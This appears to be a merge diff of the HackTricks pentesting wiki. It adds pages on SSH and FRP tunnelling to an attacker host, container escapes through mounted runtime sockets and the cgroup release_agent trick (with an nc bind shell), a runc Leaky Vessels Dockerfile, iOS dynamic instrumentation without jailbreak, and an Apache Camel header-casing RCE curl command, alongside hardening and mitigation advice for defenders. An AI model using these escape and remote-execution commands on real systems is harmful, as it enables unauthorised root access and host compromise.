Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

searchindex.js

@@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1
 
 > [!NOTE]
 > **Security – Terrapin Attack (CVE-2023-48795)**  
-> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0
+> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. 
 
 ## SSHUTTLE
 
@@ -686,7 +686,7 @@ Start the connector:
 cloudflared tunnel run mytunnel
 ```
 
-Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0
+Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. 
 
 ## FRP (Fast Reverse Proxy)
 
@@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200   # add to frps.toml
 ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
 ```
 
-The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1
+The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. 
 
 ## Other tools to check
 
@@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000**
 {{#include ../banners/hacktricks-training.md}}
 
 
-

src/generic-hacking/tunneling-and-port-forwarding.md

@@ -291,13 +291,73 @@ locate the other containers' filesystems and SA / web identity tokens
 
 
 
+### Other Sensitive Host Sockets and Directories (2023-2025)
+
+Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. **Treat the following paths as highly sensitive and never expose them to untrusted workloads**:
+
+```text
+/run/containerd/containerd.sock     # containerd CRI socket
+/var/run/crio/crio.sock             # CRI-O runtime socket
+/run/podman/podman.sock             # Podman API (rootful or rootless)
+/var/run/kubelet.sock               # Kubelet API on Kubernetes nodes
+/run/firecracker-containerd.sock    # Kata / Firecracker
+```
+
+Attack example abusing a mounted **containerd** socket:
+
+```bash
+# inside the container (socket is mounted at /host/run/containerd.sock)
+ctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest
+ctr --address /host/run/containerd.sock run --tty --privileged --mount \
+  type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh
+chroot /host /bin/bash   # full root shell on the host
+```
+
+A similar technique works with **crictl**, **podman** or the **kubelet** API once their respective sockets are exposed.
+
+Writable **cgroup v1** mounts are also dangerous. If `/sys/fs/cgroup` is bind-mounted **rw** and the host kernel is vulnerable to **CVE-2022-0492**, an attacker can set a malicious `release_agent` and execute arbitrary code in the *initial* namespace:
+
+```bash
+# assuming the container has CAP_SYS_ADMIN and a vulnerable kernel
+mkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release
+
+echo '/tmp/pwn' > /sys/fs/cgroup/release_agent   # requires CVE-2022-0492
+
+echo -e '#!/bin/sh\nnc -lp 4444 -e /bin/sh' > /tmp/pwn && chmod +x /tmp/pwn
+sh -c "echo 0 > /tmp/x/cgroup.procs"  # triggers the empty-cgroup event
+```
+
+When the last process leaves the cgroup, `/tmp/pwn` runs **as root on the host**. Patched kernels (>5.8 with commit `32a0db39f30d`) validate the writer’s capabilities and block this abuse.  
+
+### Mount-Related Escape CVEs (2023-2025)
+
+* **CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak**  
+  runc ≤1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or `docker exec` could start a container whose *working directory* is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥25.0.3, containerd ≥1.7.14). 
+
+  ```Dockerfile
+  FROM scratch
+  WORKDIR /proc/self/fd/4   # 4 == "/" on the host leaked by the runtime
+  CMD ["/bin/sh"]
+  ```
+
+* **CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU**  
+  A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be *copy-up* into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted `docker build` on a vulnerable daemon.
+
+### Hardening Reminders (2025)
+
+1. Bind-mount host paths **read-only** whenever possible and add `nosuid,nodev,noexec` mount options.
+2. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly.
+3. Keep the container runtime up-to-date (runc ≥1.1.12, BuildKit ≥0.12.5, containerd ≥1.7.14).
+4. In Kubernetes, use `securityContext.readOnlyRootFilesystem: true`, the *restricted* PodSecurity profile and avoid `hostPath` volumes pointing to the paths listed above.
+
 ### References
 
+- [runc CVE-2024-21626 advisory](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)
+- [Unit 42 analysis of CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)
 - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)
 - [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
 - [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
-

src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## Main idea
 
 Applications signed with the **entitlement `get_task_allow`** allow third party applications to run a function called **`task_for_pid()`** with the process ID of the initial application as argument in order to get the task port over it (be able to control it and access it's memory).
@@ -56,32 +55,78 @@ Note that you might need **AppSync Unified tweak** from Cydia to prevent any `in
 Once intalled, you can use **Iridium tweak** from Cydia in order to obtain the decrypted IPA.
 
 
-### Patch entitlements & re-sign
+### Patch entitlements & re-sign
 
 In order to re-sign the application with the `get-task-allow` entitlement there are several tools available like `app-signer`, `codesign`, and `iResign`. `app-signer` has a very user-friendly interface that allows to very easily resing an IPA file indicating the IPA to re-sign, to **put it `get-taks-allow`** and the certificate and provisioning profile to use.
 
 Regarding the certificate and signing profiles, Apple offers **free developer signing profiles** for all accounts through Xcode. Just create an app and configure one. Then, configure the **iPhone to trust the developer apps** by navigating to `Settings` → `Privacy & Security`, and click on `Developer Mode`.
 
-
 With the re-signed IPA, it's time to install it in the device to pentest it:
 
 ```bash
 ideviceinstaller -i resigned.ipa -w
 ```
 
-### Hook
+---
+
+### Enable Developer Mode (iOS 16+)
+
+Since iOS 16 Apple introduced **Developer Mode**: any binary that carries `get_task_allow` *or* is signed with a development certificate will refuse to launch until Developer Mode is enabled on the device. You will also not be able to attach Frida/LLDB unless this flag is on.
+
+1. Install or push **any** developer-signed IPA to the phone.
+2. Navigate to **Settings → Privacy & Security → Developer Mode** and toggle it on.
+3. The device will reboot; after entering the passcode you will be asked to **Turn On** Developer Mode.
+
+Developer Mode remains active until you disable it or wipe the phone, so this step only needs to be performed once per device. [Apple documentation](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) explains the security implications.
+
+### Modern sideloading options
+
+There are now several mature ways to sideload and keep re-signed IPAs up-to-date without a jailbreak:
+
+| Tool | Requirements | Strengths | Limitations |
+|------|--------------|-----------|-------------|
+| **AltStore 2 / SideStore** | macOS/Windows/Linux companion that re-signs the IPA every 7 days with a free dev profile | Automatic reload over Wi-Fi, works up to iOS 17 | Needs computer on the same network, 3-app limit imposed by Apple |
+| **TrollStore 1/2** | Device on iOS 14 – 15.4.1 vulnerable to the CoreTrust bug | *Permanent* signing (no 7-day limit); no computer required once installed | Not supported on iOS 15.5+ (bug patched) |
+
+For routine pentests on current iOS versions Alt/Side-Store are usually the most practical choice.
 
-You could easily hook your app using common tools like frida an objection:
+### Hooking / dynamic instrumentation
+
+You can hook your app exactly as on a jailbroken device once it is signed with `get_task_allow` **and** Developer Mode is on:
 
 ```bash
-objection -g [your app bundle ID] explore
+# Spawn & attach with objection
+objection -g "com.example.target" explore
+
+# Or plain Frida
+frida -U -f com.example.target -l my_script.js --no-pause
+```
+
+Recent Frida releases (>=16) automatically handle pointer authentication and other iOS 17 mitigations, so most existing scripts work out-of-the-box.
+
+### Automated dynamic analysis with MobSF (no jailbreak)
 
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+
+```bash
+docker pull opensecurity/mobile-security-framework-mobsf:latest
+docker run -p 8000:8000 --privileged \
+           -v /var/run/usbmuxd:/var/run/usbmuxd \
+           opensecurity/mobile-security-framework-mobsf:latest
+# Browse to http://127.0.0.1:8000 and upload your resigned IPA
 ```
 
+MobSF will automatically deploy the binary, enable a Frida server inside the app sandbox and generate an interactive report.
+
+### iOS 17 & Lockdown Mode caveats
+
+* **Lockdown Mode** (Settings → Privacy & Security) blocks the dynamic linker from loading unsigned or externally signed dynamic libraries. When testing devices that might have this mode enabled make sure it is **disabled** or your Frida/objection sessions will terminate immediately.
+* Pointer Authentication (PAC) is enforced system-wide on A12+ devices. Frida ≥16 transparently handles PAC stripping — just keep both *frida-server* and the Python/CLI toolchain up-to-date when a new major iOS version ships.
 
 ## References
 
 - [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
-
+- Apple developer documentation – Enabling Developer Mode on a device: <https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device>
+- Mobile Security Framework (MobSF): <https://mobsf.github.io/Mobile-Security-Framework-MobSF/>
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md

@@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI
 ---
 
 ## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
-* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0
-* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2
+* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. 
+* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. 
 
 Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable.
 
 ---
 
 ## References
-* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0
-* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2
+* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. 
+* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. 
 
 {{#include /src/banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/django.md

@@ -193,8 +193,46 @@ Lastly, HSTS is a security feature that forces browsers to communicate with serv
 Strict-Transport-Security: max-age=3153600
 ```
 
+## Header Name Casing Bypass
+
+HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`).  If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.
+
+Typical situations where this mistake appears:
+
+* Custom allow/deny lists that try to block “dangerous” internal headers before the request reaches a sensitive component.
+* In-house implementations of reverse-proxy pseudo-headers (e.g. `X-Forwarded-For` sanitisation).
+* Frameworks that expose management / debug endpoints and rely on header names for authentication or command selection.
+
+### Abusing the bypass
+
+1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
+2. Send the **same header with a different casing** (mixed-case or upper-case).  Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
+3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.
+
+### Example: Apache Camel `exec` RCE (CVE-2025-27636)
+
+In vulnerable versions of Apache Camel the *Command Center* routes try to block untrusted requests by stripping the headers `CamelExecCommandExecutable` and `CamelExecCommandArgs`.  The comparison was done with `equals()` so only the exact lowercase names were removed.
+
+```bash
+# Bypass the filter by using mixed-case header names and execute `ls /` on the host
+curl "http://<IP>/command-center" \
+  -H "CAmelExecCommandExecutable: ls" \
+  -H "CAmelExecCommandArgs: /"
+```
+
+The headers reach the `exec` component unfiltered, resulting in remote command execution with the privileges of the Camel process.
+
+### Detection & Mitigation
+
+* Normalise all header names to a single case (usually lowercase) **before** performing allow/deny comparisons.
+* Reject suspicious duplicates: if both `Header:` and `HeAdEr:` are present, treat it as an anomaly.
+* Use a positive allow-list enforced **after** canonicalisation.
+* Protect management endpoints with authentication and network segmentation.
+
+
 ## References
 
+- [CVE-2025-27636 – RCE in Apache Camel via header casing bypass (OffSec blog)](https://www.offsec.com/blog/cve-2025-27636/)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
 - [https://web.dev/security-headers/](https://web.dev/security-headers/)